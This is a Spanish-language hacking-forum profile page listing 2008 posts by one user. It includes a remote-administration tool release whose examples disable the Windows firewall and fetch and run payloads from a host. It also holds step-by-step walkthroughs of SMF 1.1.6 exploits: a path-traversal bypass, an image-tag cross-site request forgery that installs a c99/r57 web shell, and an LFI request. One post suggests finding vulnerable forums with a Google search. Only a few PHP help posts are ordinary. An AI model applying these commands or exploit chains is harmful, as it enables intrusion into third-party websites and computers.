Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#4201
Seguridad / Re: Nueva encuesta: Mejor Firewall
11 Noviembre 2008, 01:17 AM
CitarWindows Firewall XP SP2     - 47 (7.7%)
:xD jaja que risa, recuerdo que alguien una ves me dijo por msn que el firewall de windows era el mejor que existía hasta que le mostré como deshabilitarlo con un solo comando  :P.

No pusieron los mejores firewalls que existen APF, Iptables, AtGuard, Black Ice el que le hace la cruz publicamente a Nmap, al comienzo solo para linux pero ahora también para win32. De todas maneras voté por el zone alarm  :P
#4202
¿Podemos colaborar en la web?
#4203
Abril negro / [Proyecto] El Maletín (Binario)
10 Noviembre 2008, 02:28 AM
El maletín



Versión 1.3 Beta - Descargar acá

Código Fuente: https://foro.elhacker.net/php/proyecto_el_maletin_fuente-t235451.0.html

Antes que nada quiero aclarar que esta herramienta es para "Administración Remota" de código libre por lo tanto no viola ningún tipo de norma legal.
Está demás decir que solo se permite su ejecución en un ambiente controlado donde el propietario de la pc controlada tenga consiencia del hecho.



¿De que se trata?


  • Es un software que tiene todas las herramientas mas útiles al momento de ingresar en un sistema en modo consola debido a que no depende de un modo gráfico (GUI).

  • Entre algunas opciones El Maletín permite la codificación y decodificación de múltiples algoritmos como MD5 y Base64.

  • También permite la ejecución de comandos en modo "SYSTEM NT AUTORITY" accediendo a un nivel mas alto que el propio administrador accediendo a la manipulación de servicios del sistema entre otros. El Maletín tiene la capacidad de ejecutar estos comandos en modo de interacción con el escritorio y sin el, en otras palabras oculto o segundo plano.

  • Contiene un sistema de descarga de archivos remotos tales como archivos de websites (Downloader).

  • Tiene la capacidad de realizar la administración remotamente sin la necesidad de sistemas remotos extras tales como Netcat, Telnet y SSH debido a que incorpora un sistema de conexión pipeada atraves de Sockets.

  • Tiene la capacidad de crear o eliminar extensiones de archivos ejecutables, por ejemplo hacer que un archivo .jpg se comporte como un .exe tal cual lo hace "Extension Creator" pero con la diferencia de tener la posibilidad de revertir este efecto.

  • También es capaz de habilitar o deshabilitar el Firewall de Windows que viene por defecto en Windows XP y Vista en caso de ser necesario como la utilización de la conexión del mismo Maletín.

CitarD:\Laboratorio\Proyectos\el maletin>mt -hv
→ El Maletin V1.2 Beta por WHK
Uso: mt -[Argumentos] [valores]

-------------------------------------------------------------------------------
Argumento* : v
Descripcion: Activa el modo verbose.
-------------------------------------------------------------------------------
Argumento* : !v
Descripcion: Desactiva todos los mensajes.
-------------------------------------------------------------------------------
Argumento  : h
Descripcion: Visualiza la ayuda.
-------------------------------------------------------------------------------
Argumento  : md5 [buffer]
Descripcion: Cifra el buffer basado en el algoritmo MD5.
-------------------------------------------------------------------------------
Argumento  : b64e [buffer]
Descripcion: Cifra el buffer basado en el algoritmo Base64.
-------------------------------------------------------------------------------
Argumento  : b64d [buffer]
Descripcion: Descifra el buffer basado en el algoritmo Base64.
-------------------------------------------------------------------------------
Argumento  : d [URL] [Salida]
Descripcion: Descarga un archivo desde una URL basado en el protocolo HTTP,
             HTTPS y FTP. Si se omite [Salida] se guardara con su nombre
             original.
-------------------------------------------------------------------------------
Argumento  : i [Direccion IP] [Puerto]
Descripcion: conexión inversa que permite manipular remotamente una Shell
             desde un servidor especificando su direccion Ip y Puerto.
-------------------------------------------------------------------------------
Argumento  : e [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell.
-------------------------------------------------------------------------------
Argumento  : esi [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell con derechos del
             sistema (NT Autority) en modo interactivo con el escritorio.
-------------------------------------------------------------------------------
Argumento  : esb [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell con derechos del
             sistema (NT Autority) en modo background (segundo plano o
             invisible).
-------------------------------------------------------------------------------
Argumento  : ext [extensión]
Descripcion: Establece la extensión como ejecutable.
-------------------------------------------------------------------------------
Argumento  : fw [Modo]
Descripcion: Modo=[on - off] Habilitar/Deshabilitar firewall de Windows
-------------------------------------------------------------------------------
Argumento  : unext [extensión]
Descripcion: Elimina la extensión ejecutable.
-------------------------------------------------------------------------------
Argumento  : -info
Descripcion: Despliega la informacion completa del sistema.
-------------------------------------------------------------------------------
(*) = Puede ejecutarse simultaneamente adicionalmente sobre otros argumentos
Ejemplos:
→ mt -md5 Palabras con espacios... > buffer.log
→ mt -b64d < codificado.reg > decodificado.txt
→ mt -b64e < bin.exe > bin_cifrado.exe
→ type texto.txt | mt -b64e > cifrado.txt
→ mt -fw off&&cd %%tmp%%&&md IO&&cd IO&&mt -d http://host/vnc.packed IO.packed
→ copy mt.exe %tmp%\mt.exe && mt -!vesb %tmp%\mt -d!v http://host/script.dat scr
ipt ^&^& mt ^< script && del /f /q mt.exe && exit
En el caso de asignar un [buffer] este puede ser establecido con espacios en bla
nco sin la necesidad de encerrarlos en comillas ya que estas se consideraran par
te del mismo buffer.

D:\Laboratorio\Proyectos\el maletin>
#4204
Nivel Web / Re: SMF 1.1.6 multiples fallas
8 Noviembre 2008, 20:30 PM
CitarVamos sirdarckcar :) solo 1 o 2 =D
Juaz todavía no se lo que quieren si ya todo está requete explicado  :-\
El exploit en perl solo basta ejecutarlo y darle la url del foro y ya que mas.

si quieres probar ahi tienes foros:
http://www.google.cl/search?hl=es&q=Powered+by+SMF&btnG=Buscar&meta=
Solo busca alguno que te deje subir archivos y ya.
#4205
Nivel Web / Re: SMF 1.1.6 multiples fallas
7 Noviembre 2008, 15:52 PM
Citarsdc envianos algunos PoCs y details, a ver si Alex te permite hacer alguna probe y los suscriptors tengan mas details...

Los PoCs están en milw0rm y lo unico que debes hacer es ejecutarlos, ambos están en perl, los puse arriba en el primer post.

Lo de explicar ¿creo que se entiende no? auqnue bueno, te lo explicaré..

http://milw0rm.com/exploits/6993:
http://translate.google.cl/translate?u=http%3A%2F%2Fmilw0rm.com%2Fexploits%2F6993&sl=en&tl=es&hl=es&ie=UTF-8

La primera falla consiste en que SMF no te pide la contraseña de administración verificadora , solo necesitas ser admin, si te fijas bién cuando quieres hacer alguna modificación como administrador siempre debes ingrear la contraseña aunque estés logueado a exepción del caso en que quieras instalar un paquete y ahí va la primera falla.

La segunda consiste en que puedes instalar cualquier paquete sin la necesidad de cofirmación ni código de seguridad (el típico sesc) asi que puedes ejecutar un XSRF o sea hacer que el administrador instale el paquete que tu quieras sin que el lo desee, además el paquete no necesariamente puede estar en el directorio /packages.

La tercera falla es que un archivo subido como adjunto no lleva ningún carácter al azar, o sea ese hash que se ponen a los archivos pueden ser descifrables y consiste de la siguiente manera:

Citar[id]_[name]_[ext][md5([name].[ext])]

La cuarta falla es una falla que ya se conoce de lejos para poder ejecutar un XSRF y es poner una imagen con una url que te redireccione aunque lo veo dificil que se animen a crear un sistema que verifique si la imagen es válida o no.


Con todo esto creo que ya te ha dado un poco la idea de lo que puedes hacer, subes un zip con un paquete que contenga un xml que desempaquete una shell como un c99 o un r57 en un directorio poco común y lo subes al servidor como archivo adjunto, ahora en algunos casos los foros no dejan subir este tipo de archivos pero descubrí que al momento de instalar un paquete el sistema le vale madre que extension tenga asi que le puedes poner *.pg, después calculas la ruta exacta del archio y te creas un post en la sección de reclamos y le mentas la madre al admin  :P pero moderadamente para que no te lo borren sino que te respondan y al ver el tema logueados harán que la imagen [img][/img] los redireccione hacia la instalación del paquete de la siguiente manera:
http://[website]/SMF/index.php?action=packages;sa=install2;package=./../attachaments/[filename]
y listo, la shell ha sido subida y ya puedes darle el susto de tu vida o desmadrarlo.


El segundo PoC http://milw0rm.com/exploits/7011:
http://translate.google.cl/translate?u=http%3A%2F%2Fmilw0rm.com%2Fexploits%2F7011&sl=en&tl=es&hl=es&ie=UTF-8

Se trata de un LFI donde el SMF hace un include con la variable "val" en esta petición:
Citar/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif%2500
Solo subes una imagen que contenga instrucciones php y listo, hasta puedes hacerlo desde un archivoa djunto y no desde el avatar como aparece en el exploit, da igual ya que lo que importa es el LFI.


¿Dudas?
#4206
Nivel Web / SMF 1.1.6 multiples fallas
6 Noviembre 2008, 09:00 AM
Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit
http://milw0rm.com/exploits/6993

Simple Machines Forum <= 1.1.6 (LFI) Code Execution Exploit
http://milw0rm.com/exploits/7011

En ambos casos es posible causar la ejecución de códigos o subir directamente una shell como un r57 o un c99 aunque es necesario que el atacante pueda subir archivos adjunto en un post para poder ejecutar cualquiera de estos dos exploits donde uno se trata de un LFI y el otro de paquetes autoinstalables sin la verificación de un sesc.

En el primer exploit aparece lo siguiente:
Citar$this->url->package = '../attachments/' . $this->url->package;
SMF te devolverá un error ya que filtra si alguien intenta escapar del directorio de paquetes, modificamos por lo siguiente:
Citar$this->url->package = './../attachments/' . $this->url->package;
Solo verifica que los primeros tres carácteres no sean '../' asi que le anteponemos './' y ya.

También descubrí otro bypass que permite instalar paquetes sin verificar la extension del archivo, ahora dicen 'para que sirve?'... supongamos que nuestro foro objetivo solo deja subir archivos jpg, renombramos el paquete con la shell a *.jpg y listo, luego decimos las palabras mágicas..
http://127.0.0.1/foro/index.php?action=packages;sa=install2;package=... ...test.jpg
dentro de un xsrf ovbio hacia el admin y ya está instalado bypaseando el path antihacking  :P y la extensión del archivo.

Algo muy curioso es que después de tres dias nadie se haya dado cuenta, ni los de simplemachines ya que no hay parche ni post en la sección de bugs ni en ninguna otra comunidad.

No pierdan el tiempo, ya probé con foros amigos y no dejan subir nada  :P
El admin de este foro ya tomó las medidas necesarias para evitar catastrofes  :xD
#4207
El servidor no está disponible, no carga la web.

http://translate.google.cl/translate?u=http%3A%2F%2Fwarzone.elhacker.net%2F

==>

CitarGoogle      
Error


    Server Error
    The server encountered an error and could not complete your request.

    If the problem persists, please report your problem and mention this error message and the query that caused it.
#4208
PHP / Re: $_POST no funciona
3 Noviembre 2008, 04:23 AM
Bueno, olvidenlo. Reinstalé el servidor y ya se arregló. :¬¬
#4209
PHP / $_POST no funciona
2 Noviembre 2008, 16:31 PM
Hola, tengo un problema en mi servidor y es que no funciona el array $_POST, como yo no soy el único que manipula los archivos de configuraciones no se que pudo haber pasado.
Talvés algo en la configuración del PHP o del Apache no lo sé.

Cuando intento ingresar en algún sistema del servidor como por ejemplo en el phpmyadmin no me deja y probando lo siguiente:
Código (php) [Seleccionar]
$probar = array($_COOKIE,$_POST);

for($cuenta=0;$cuenta<count($probar);$cuenta++){
if($probar[$cuenta] == $_COOKIE){
  $array = '$_COOKIE';
}else{
  $array = '$_POST';
}
foreach($probar[$cuenta] as $variable => $valor){
   echo '<br />Arrays: '.$array.' Variable: '.$variable.' Valor: '.$valor.'<br />';
}
}

exit(0);


Me aparecen las cookies pero la petición POST para loguearme no.

Ahora lo pruebo directamente:
Código (php) [Seleccionar]
echo 'pma_username : '.$_POST['pma_username'].'<br />';
echo 'pma_password : '.$_POST['pma_password'].'<br />';


Y nada:
Citarpma_username :
pma_password :

Alguien sabe que pudo probocar que el array $_POST deje de funcionar?
No quiero reestablecer los archivos de configuración porque son demasiados cambios y muchos procesos asociados a el y creo que esta sería algo así como la última opción.

Gracias.
#4210
PHP / Re: problema con Cookies
28 Octubre 2008, 06:06 AM
Cuando estableces una cookie esta debe ser enviada mientras la cabezera se está enviando (header), después de esto comienza a aparecer la web y ya no puedes establecer ninguna cookie hasta la próxima carga.

El problema está en que intentas establecer una cookie justo después que ya enviaste el header.

Fijate que aparece antes de ese mensaje de error. Lo que si puedes hacer es jugar con $_SESSION[] ya que puedes almacenar datos dentro del servidor identificandose con su cookie y no es necesario enviar una cabecera cada ves que deseas modificar su contenido.